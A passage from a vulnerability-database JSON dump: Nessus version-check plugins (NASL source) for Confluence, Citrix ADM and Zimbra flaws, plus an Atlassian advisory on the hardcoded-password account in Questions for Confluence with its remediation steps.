value:'Atlassian Confluence Namespace OGNL Injection');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:\"CANVAS\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2022/06/02\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2022/06/02\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2023/01/04\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"combined\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:atlassian:confluence\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2022-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"confluence_win_installed.nbin\", \"confluence_nix_installed.nbin\", \"confluence_detect.nasl\");\n script_require_keys(\"installed_sw/Atlassian Confluence\");\n\n exit(0);\n}\n\ninclude('vcf.inc');\n\nvar app_name = 'Atlassian Confluence';\n\nvar app_info = vcf::combined_get_app_info(app:app_name);\nvcf::check_granularity(app_info:app_info, sig_segments:3);\n\nvar constraints = [\n {\"min_version\": \"1.3.0\", \"fixed_version\": \"7.4.17\", \"fixed_display\": \"7.4.17 / 7.18.1\"},\n {\"min_version\": \"7.5.0\", \"fixed_version\": \"7.13.7\", \"fixed_display\": \"7.13.7 / 7.18.1\"},\n {\"min_version\": \"7.14.0\", \"fixed_version\": \"7.14.3\", \"fixed_display\": \"7.14.3 / 7.18.1\"},\n {\"min_version\": \"7.15.0\", \"fixed_version\": \"7.15.2\", \"fixed_display\": \"7.15.2 / 7.18.1\"},\n {\"min_version\": \"7.16.0\", \"fixed_version\": \"7.16.4\", \"fixed_display\": \"7.16.4 / 7.18.1\"},\n {\"min_version\": \"7.17.0\", \"fixed_version\": \"7.17.4\", \"fixed_display\": \"7.17.4 / 7.18.1\"},\n {\"min_version\": \"7.18.0\", \"fixed_version\": \"7.18.1\", \"fixed_display\": \"7.18.1\"}\n];\n\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_HOLE);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-17T16:30:44", "description": "According to its self-reported version number, the Atlassian Confluence running on the remote host is affected by a command injection vulnerability. A remote, unauthenticated attacker can use this to execute arbitrary code.\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2022-06-03T00:00:00", "type": "nessus", "title": "Atlassian Confluence Command Injection (CVE-2022-26134)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2022-26134"], "modified": "2023-01-16T00:00:00", "cpe": ["cpe:/a:atlassian:confluence"], "id": "CONFLUENCE_CVE-2022-26134_REMOTE.NASL", "href": "https://www.tenable.com/plugins/nessus/161808", "sourceData": "##\n# (C) Tenable, Inc.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(161808);\n script_version(\"1.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/01/16\");\n\n script_cve_id(\"CVE-2022-26134\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/06/06\");\n script_xref(name:\"IAVA\", value:\"2022-A-0227\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2022-0023\");\n\n script_name(english:\"Atlassian Confluence Command Injection (CVE-2022-26134)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A web application running on the remote host is affected by a command injection\nvulnerability\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its self-reported version number, the Atlassian Confluence running\non the remote host is affected by a command injection vulnerability. A remote,\nunauthenticated attacker can use this to execute arbitrary code.\n\nNote that Nessus has not tested for this issue but has instead relied only on\nthe application's self-reported version number.\");\n # https://confluence.atlassian.com/doc/confluence-security-advisory-2022-06-02-1130377146.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?c1df4fa0\");\n # https://www.volexity.com/blog/2022/06/02/zero-day-exploitation-of-atlassian-confluence/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?5cd914cb\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Atlassian Confluence version 7.4.17, 7.13.7, 7.14.3, 7.15.2, 7.16.4, 7.17.4, 7.18.1 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2022-26134\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Atlassian Confluence Namespace OGNL Injection');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:\"CANVAS\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2022/06/02\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2022/06/02\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/06/03\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:atlassian:confluence\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2022-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"confluence_detect.nasl\");\n script_require_keys(\"installed_sw/confluence\");\n script_require_ports(\"Services/www\", 8080, 8090);\n\n exit(0);\n}\n\ninclude('vcf.inc');\ninclude('http.inc');\n\nvar app_name = 'confluence';\n\nvar port = get_http_port(default:8090);\n\nvar app_info = vcf::get_app_info(app:app_name, port:port, webapp:true);\nvcf::check_granularity(app_info:app_info, sig_segments:3);\n\nvar constraints = [\n { \"fixed_version\": \"7.4.17\", \"fixed_display\": \"7.4.17 / 7.18.1\"},\n {\"min_version\": \"7.5.0\", \"fixed_version\": \"7.13.7\", \"fixed_display\": \"7.13.7 / 7.18.1\"},\n {\"min_version\": \"7.14.0\", \"fixed_version\": \"7.14.3\", \"fixed_display\": \"7.14.3 / 7.18.1\"},\n {\"min_version\": \"7.15.0\", \"fixed_version\": \"7.15.2\", \"fixed_display\": \"7.15.2 / 7.18.1\"},\n {\"min_version\": \"7.16.0\", \"fixed_version\": \"7.16.4\", \"fixed_display\": \"7.16.4 / 7.18.1\"},\n {\"min_version\": \"7.17.0\", \"fixed_version\": \"7.17.4\", \"fixed_display\": \"7.17.4 / 7.18.1\"},\n {\"min_version\": \"7.18.0\", \"fixed_version\": \"7.18.1\", \"fixed_display\": \"7.18.1\"}\n];\n\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_HOLE);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-06-01T04:27:07", "description": "The Atlassian Confluence running on the remote host is affected by a command injection vulnerability. A remote, unauthenticated attacker can use this to execute arbitrary code.\n\nNote this plugin currently only works against 7.14.x and below. This plugin is intended for testing LTS versions of Confluence.", "cvss3": {}, "published": "2022-06-14T00:00:00", "type": "nessus", "title": "Atlassian Confluence Command Injection (CVE-2022-26134) (Direct Check)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2022-26134"], "modified": "2023-05-31T00:00:00", "cpe": ["cpe:/a:atlassian:confluence"], "id": "CONFLUENCE_CVE_2022_26134.NBIN", "href": "https://www.tenable.com/plugins/nessus/162175", "sourceData": "Binary data confluence_cve_2022_26134.nbin", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-17T18:30:52", "description": "Multiple vulnerabilities exist in Citrix Application Delivery Management (ADM) 13.0 prior to 13.0-85.19 and 13.1 prior to 13.1-21.53. An unauthenticated, remote attacker can exploit this to reset the administrator password and gain administrative access to the appliance.\n\nNote that Nessus has not attempted to exploit these issues but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2022-06-16T00:00:00", "type": "nessus", "title": "Citrix ADM 13.0.x < 13.0.85.19 / 13.1.x < 13.1.21.53 Multiple Vulnerabilities (CTX460016)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2022-27511", "CVE-2022-27512"], "modified": "2022-07-01T00:00:00", "cpe": ["cpe:/a:citrix:application_delivery_management"], "id": "CITRIX_ADM_CTX460016.NASL", "href": "https://www.tenable.com/plugins/nessus/162330", "sourceData": "##\n# (C) Tenable, Inc.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(162330);\n script_version(\"1.4\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/07/01\");\n\n script_cve_id(\"CVE-2022-27511\", \"CVE-2022-27512\");\n script_xref(name:\"IAVA\", value:\"2022-A-0254\");\n\n script_name(english:\"Citrix ADM 13.0.x < 13.0.85.19 / 13.1.x < 13.1.21.53 Multiple Vulnerabilities (CTX460016)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote device is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"Multiple vulnerabilities exist in Citrix Application Delivery Management (ADM) 13.0 prior to 13.0-85.19 and 13.1 prior\nto 13.1-21.53. An unauthenticated, remote attacker can exploit this to reset the administrator password and gain\nadministrative access to the appliance.\n\nNote that Nessus has not attempted to exploit these issues but has instead relied only on the application's self-reported\nversion number.\");\n # https://support.citrix.com/article/CTX460016/citrix-application-delivery-management-security-bulletin-for-cve202227511-and-cve202227512\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?de07e06e\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to version 13.0.85.19 or 13.1.21.53 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:C/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2022-27511\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2022/06/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2022/06/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/06/16\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:citrix:application_delivery_management\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"citrix_adm_ssh_detect.nbin\");\n script_require_keys(\"installed_sw/Citrix ADM\");\n\n exit(0);\n}\n\ninclude('vcf.inc');\n\nvar app_info = vcf::get_app_info(app:'Citrix ADM');\n\nvar constraints = [\n {'min_version': '13.0', 'fixed_version': '13.0.85.19', 'fixed_display': '13.0-85.19'},\n {'min_version': '13.1', 'fixed_version': '13.1.21.53', 'fixed_display': '13.1-21.53'}\n];\n\nvcf::check_version_and_report(\n app_info: app_info,\n constraints: constraints,\n severity: SECURITY_HOLE\n);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-17T16:35:48", "description": "According to its self-reported version number, Zimbra Collaboration Server is affected by a multiple vulnerabilities:\nincluding the following:\n\n - An attacker can upload arbitrary files through amavisd via a cpio loophole that can lead to incorrect access to any other user accounts. (CVE-2022-41352)\n\n - Zimbra's sudo configuration permits the zimbra use to execute the zmslapd binary as root with arbitrary parameters. This includes plugins in the form of .so files specified in a user-defined configuration file. (CVE-2022-37393)\n\n - An information disclosure vulnerability due to an XSS in one of the attributes of an IMG element.\n (CVE-2022-41348)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2022-10-13T00:00:00", "type": "nessus", "title": "Zimbra Collaboration Server 9.0.0 < 9.0.0 Patch 27 Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2022-37393", "CVE-2022-41348", "CVE-2022-41352"], "modified": "2023-03-08T00:00:00", "cpe": ["cpe:/a:zimbra:collaboration_suite"], "id": "ZIMBRA_9_0_0_P27.NASL", "href": "https://www.tenable.com/plugins/nessus/166097", "sourceData": "#%NASL_MIN_LEVEL 80900\n##\n# (C) Tenable, Inc.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(166097);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/03/08\");\n\n script_cve_id(\"CVE-2022-37393\", \"CVE-2022-41348\", \"CVE-2022-41352\");\n script_xref(name:\"IAVA\", value:\"2022-A-0419-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/11/10\");\n\n script_name(english:\"Zimbra Collaboration Server 9.0.0 < 9.0.0 Patch 27 Multiple Vulnerabilities\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server contains a web application that is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its self-reported version number, Zimbra Collaboration Server is affected by a multiple vulnerabilities:\nincluding the following:\n\n - An attacker can upload arbitrary files through amavisd via a cpio loophole that can lead to\n incorrect access to any other user accounts. (CVE-2022-41352)\n\n - Zimbra's sudo configuration permits the zimbra use to execute the zmslapd binary as root with\n arbitrary parameters. This includes plugins in the form of .so files specified in a user-defined\n configuration file. (CVE-2022-37393)\n\n - An information disclosure vulnerability due to an XSS in one of the attributes of an IMG element.\n (CVE-2022-41348)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://wiki.zimbra.com/wiki/Zimbra_Releases/9.0.0/P27\");\n script_set_attribute(attribute:\"see_also\", value:\"https://wiki.zimbra.com/wiki/Security_Center\");\n script_set_attribute(attribute:\"see_also\", value:\"https://wiki.zimbra.com/wiki/Zimbra_Security_Advisories\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to version 9.0.0 Patch 27, or later.\");\n script_set_attribute(attribute:\"agent\", value:\"unix\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2022-41352\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Zimbra zmslapd arbitrary module load');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2022/09/24\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2022/10/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/10/13\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"combined\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:zimbra:collaboration_suite\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2022-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"zimbra_web_detect.nbin\", \"zimbra_nix_installed.nbin\");\n script_require_keys(\"installed_sw/zimbra_zcs\");\n\n exit(0);\n}\n\ninclude('vcf.inc');\ninclude('vcf_extras.inc');\n\nvar app_info = vcf::zimbra::combined_get_app_info();\n\nvar constraints = [\n {'min_version':'9.0', 'max_version':'9.0.0', 'fixed_display':'9.0.0 Patch 27', 'Patch':'27'}\n];\n\nvcf::zimbra::check_version_and_report(\n app_info:app_info,\n constraints:constraints,\n severity:SECURITY_HOLE,\n flags:{'xss':TRUE}\n);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-17T16:35:14", "description": "According to its self-reported version number, Zimbra Collaboration Server is affected by a multiple vulnerabilities:\nincluding the following:\n\n - An attacker can upload arbitrary files through amavisd via a cpio loophole that can lead to incorrect access to any other user accounts. (CVE-2022-41352)\n\n - Zimbra's sudo configuration permits the zimbra use to execute the zmslapd binary as root with arbitrary parameters. This includes plugins in the form of .so files specified in a user-defined configuration file. (CVE-2022-37393)\n\n - An information disclosure vulnerability due to an XSS attributes in the clsearch, compose and calendar components of webmail. (CVE-2022-41349. CVE-2022-41350, CVE-2022-41351)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2022-10-13T00:00:00", "type": "nessus", "title": "Zimbra Collaboration Server 8.8.15 < 8.8.15 Patch 34 Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2022-37393", "CVE-2022-41349", "CVE-2022-41350", "CVE-2022-41351", "CVE-2022-41352"], "modified": "2023-03-08T00:00:00", "cpe": ["cpe:/a:zimbra:collaboration_suite"], "id": "ZIMBRA_8_8_15_P34.NASL", "href": "https://www.tenable.com/plugins/nessus/166098", "sourceData": "#%NASL_MIN_LEVEL 80900\n##\n# (C) Tenable, Inc.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(166098);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/03/08\");\n\n script_cve_id(\n \"CVE-2022-37393\",\n \"CVE-2022-41349\",\n \"CVE-2022-41350\",\n \"CVE-2022-41351\",\n \"CVE-2022-41352\"\n );\n script_xref(name:\"IAVA\", value:\"2022-A-0419-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/11/10\");\n\n script_name(english:\"Zimbra Collaboration Server 8.8.15 < 8.8.15 Patch 34 Multiple Vulnerabilities\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server contains a web application that is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its self-reported version number, Zimbra Collaboration Server is affected by a multiple vulnerabilities:\nincluding the following:\n\n - An attacker can upload arbitrary files through amavisd via a cpio loophole that can lead to\n incorrect access to any other user accounts. (CVE-2022-41352)\n\n - Zimbra's sudo configuration permits the zimbra use to execute the zmslapd binary as root with\n arbitrary parameters. This includes plugins in the form of .so files specified in a user-defined\n configuration file. (CVE-2022-37393)\n\n - An information disclosure vulnerability due to an XSS attributes in the clsearch, compose and calendar\n components of webmail. (CVE-2022-41349. CVE-2022-41350, CVE-2022-41351)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://wiki.zimbra.com/wiki/Zimbra_Releases/8.8.15/P34\");\n script_set_attribute(attribute:\"see_also\", value:\"https://wiki.zimbra.com/wiki/Security_Center\");\n script_set_attribute(attribute:\"see_also\", value:\"https://wiki.zimbra.com/wiki/Zimbra_Security_Advisories\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to version 8.8.15 Patch 34, or later.\");\n script_set_attribute(attribute:\"agent\", value:\"unix\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2022-41352\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Zimbra zmslapd arbitrary module load');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2022/09/24\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2022/10/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/10/13\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"combined\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:zimbra:collaboration_suite\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2022-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"zimbra_web_detect.nbin\", \"zimbra_nix_installed.nbin\");\n script_require_keys(\"installed_sw/zimbra_zcs\");\n\n exit(0);\n}\n\ninclude('vcf.inc');\ninclude('vcf_extras.inc');\n\nvar app_info = vcf::zimbra::combined_get_app_info();\n\nvar constraints = [\n {'min_version':'8.8.15', 'max_version':'8.8.15', 'fixed_display':'8.8.15 Patch 34', 'Patch':'34'}\n];\n\nvcf::zimbra::check_version_and_report(\n app_info:app_info,\n constraints:constraints,\n severity:SECURITY_HOLE,\n flags:{'xss':TRUE}\n);\n", "cvss": {"score": 0.0, "vector": "NONE"}}], "atlassian": [{"lastseen": "2023-06-06T15:36:37", "description": "(i) *Update:* This advisory has been updated since its original publication.\r\n\r\n2022/08/01 12:00 PM PDT (Pacific Time, -7 hours)\r\n * {color:#172b4d}Updated the\u00a0_Remediation_ section to note that if the {{disabledsystemuser}} account is manually deleted, the app must also be updated or uninstalled to ensure the account does not get recreated{color}\r\n\r\n2022/08/01 11:00 AM PDT (Pacific Time, -7 hours)\r\n * Updated the\u00a0_Summary of Vulnerability_ section to note the email service provider for the {{dontdeletethisuser@email.com}}\u00a0account has confirmed the account has been blocked\u00a0\r\n\r\n2022/07/30 1:15 PM PDT (Pacific Time, -7 hours)\r\n * Updated the\u00a0_Summary of Vulnerability_ section to note that instances that have not remediated this vulnerability per the\u00a0_Remediation_ section below may send email notifications from Confluence to a third party email address\r\n * Additional details are available in [Confluence Security Advisory 2022-07-20|https://confluence.atlassian.com/doc/confluence-security-advisory-2022-07-20-1142446709.html]\r\n\r\n2022/07/22 9:30 AM PDT (Pacific Time, -7 hours)\r\n * Updated the\u00a0_Remediation_ section to explain only option 2 can be used for Confluence Server and Data Center instances configured to use a read-only external directory\r\n * Added a link to a page of frequently asked questions about CVE-2022-26138\r\n\r\n2022/07/21 8:30 AM PDT (Pacific Time, -7 hours)\r\n * An external party has discovered and publicly disclosed the hardcoded password on Twitter. *It is important to remediate this vulnerability on affected systems immediately.*\r\n * The Vulnerability Summary section has been updated to include this new information\r\n\r\nh3. Vulnerability Summary\r\n\r\nWhen the [Questions for Confluence app|https://marketplace.atlassian.com/apps/1211644/questions-for-confluence?hosting=server&tab=overview] is enabled on Confluence Server or Data Center, it creates a Confluence user account with the username {{{}disabledsystemuser{}}}. This account is intended to aid administrators that are migrating data from the app to Confluence Cloud. The {{disabledsystemuser}} account is created with a hardcoded password and is added to the {{confluence-users}} group, which allows viewing and editing all non-restricted pages within Confluence [by default|https://confluence.atlassian.com/doc/confluence-groups-139478.html]. A remote, unauthenticated attacker with knowledge of the hardcoded password could exploit this to log into Confluence.\r\n\r\nThe {{disabledsystemuser}} account is configured with a third party email address ({{{}dontdeletethisuser@email.com{}}}) that is not controlled by Atlassian. If this vulnerability has not been remediated per the _Fixes_\u00a0section below, an affected instance\u00a0configured\u00a0to send\u00a0[notifications|https://confluence.atlassian.com/doc/email-notifications-145162.html]\u00a0will email that address.\u00a0One example\u00a0of an email notification is\u00a0[Recommended Updates Notifications|https://confluence.atlassian.com/doc/configuring-the-recommended-updates-email-notification-281480712.html], which contains a report of the top pages from Confluence spaces the user has permissions to view. mail.com, the free email provider that manages the {{dontdeletethisuser@email.com}}\u00a0account, has confirmed to Atlassian that the account has been blocked. This means it cannot be accessed by anyone unauthorized and cannot send or receive any new messages.\r\n\r\n(!) An external party has discovered and publicly disclosed the hardcoded password on Twitter. Refer to the _Remediation_ section below for guidance on how to remediate this vulnerability.\r\nh3. How To Determine If You Are Affected\r\n\r\nA Confluence Server or Data Center instance is affected if it has an active user account with the following information:\r\n * User: {{disabledsystemuser}}\r\n * Username: {{disabledsystemuser}}\r\n * Email: {{dontdeletethisuser@email.com}}\r\n\r\nIf this account does not show up in the list of active users, the Confluence instance is not affected.\r\nh3. Remediation\r\n\r\n(!) Uninstalling the Questions for Confluence app does *not* remediate this vulnerability. The {{disabledsystemuser}} account does not automatically get removed after the app has been uninstalled. If you have verified a Confluence Server or Data Center instance is affected, two equally effective ways to remediate this vulnerability are listed below. (!)\r\nh4. Option 1: Update to a non-vulnerable version of Questions for Confluence\r\n\r\nUpdate the Questions for Confluence app to a fixed version:\r\n * 2.7.x >= 2.7.38\r\n * Versions >= 3.0.5\r\n\r\nFor more information on how to update an app, refer to [Atlassian's documentation|https://confluence.atlassian.com/upm/updating-apps-273875710.html].\r\n\r\nFixed versions of the Questions for Confluence app stop creating the {{disabledsystemuser}} user account, and remove it from the system if it has already been created. Migrating data from the app to Confluence Cloud is now a manual process.\r\n\r\n(!) If Confluence is configured to use a read-only external directory (e.g. Atlassian Crowd), you will need to follow Option 2 below.\r\nh4. Option 2: Disable or delete the {{disabledsystemuser}} account\r\n\r\nSearch for the {{disabledsystemuser}} account and either disable it or delete it. For instructions on how to disable or delete an account (including an explanation of the differences between the two options), refer to [Atlassian's documentation|https://confluence.atlassian.com/doc/delete-or-disable-users-138318.html].\r\n\r\nIf you choose to delete the {{disabledsystemuser}} account, you must also [uninstall|https://confluence.atlassian.com/upm/uninstalling-apps-273875709.html] or upgrade the Questions for Confluence app to a non-vulnerable version. *Failure to do this could result in the account being recreated after it has been deleted.*\r\n\r\nIf Confluence is configured to use a read-only external directory, refer to the [Delete from a read-only external directory, or multiple external directories section|https://confluence.atlassian.com/doc/delete-or-disable-users-138318.html#DeleteorDisableUsers-Deletefromaread-onlyexternaldirectory,ormultipleexternaldirectories]\u00a0from the same document\r\nh3. Frequently Asked Questions\r\n\r\nWe'll update the\u00a0[FAQ for CVE-2022-26138|https://confluence.atlassian.com/kb/faq-for-cve-2022-26138-1141988423.html]\u00a0with answers for commonly asked questions.\r\nh3. Security Advisory\r\n\r\nFor additional details, refer to [Confluence Security Advisory 2022-07-20|https://confluence.atlassian.com/doc/confluence-security-advisory-2022-07-20-1142446709.html].\u00a0", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-07-08T17:06:14", "type": "atlassian", "title": "Questions For Confluence App - Hardcoded Password", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26138"], "modified": "2023-02-21T15:41:00", "id": "CONFSERVER-79483", "href": "https://jira.atlassian.com/browse/CONFSERVER-79483", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-06-06T15:36:53", "description": "In affected versions of Confluence Server and Data Center, an OGNL injection vulnerability exists that would allow an unauthenticated attacker to execute arbitrary code on a Confluence Server or Data Center instance.\r\n\u00a0\r\nThe affected versions are from 1.3.0 before 7.4.17, from 7.13.0 before 7.13.7, from 7.14.0 before 7.14.3, from 7.15.0 before 7.15.2, from 7.16.0 before 7.16.4, from 7.17.0 before 7.17.4, and from 7.18.0 before 